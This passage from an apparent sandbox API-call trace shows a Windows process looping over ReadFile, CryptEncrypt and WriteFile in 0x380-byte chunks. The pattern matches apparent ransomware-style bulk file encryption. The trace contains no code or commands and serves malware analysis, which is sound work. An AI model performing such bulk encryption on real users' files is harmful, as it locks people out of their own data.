lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.215] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.216] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.216] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.216] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.216] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.216] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.216] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.216] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.216] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.216] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.216] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.216] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.216] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.217] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.217] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.217] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.217] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.217] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.217] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.217] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.217] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.217] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.217] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.217] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.217] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.217] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.218] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.218] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.218] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.218] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.218] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.218] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.218] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.218] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.219] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.219] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.219] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.219] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.219] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.219] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.219] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.219] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.219] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.219] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.219] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.219] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.219] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.220] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.220] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.220] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.220] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.220] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.220] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.220] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.220] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.220] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.220] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.220] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.220] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.220] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.221] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.221] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.221] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.221] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.221] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.221] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.221] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.221] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.221] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.221] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.221] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.221] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.222] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.222] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.222] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.222] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.222] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.222] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.222] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.222] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.222] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.222] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.222] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.222] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.222] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.223] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.223] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.223] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.223] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.223] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.223] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.223] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.223] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.223] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.223] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.223] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.223] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.223] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.224] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.224] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.224] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.224] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.224] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.224] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, 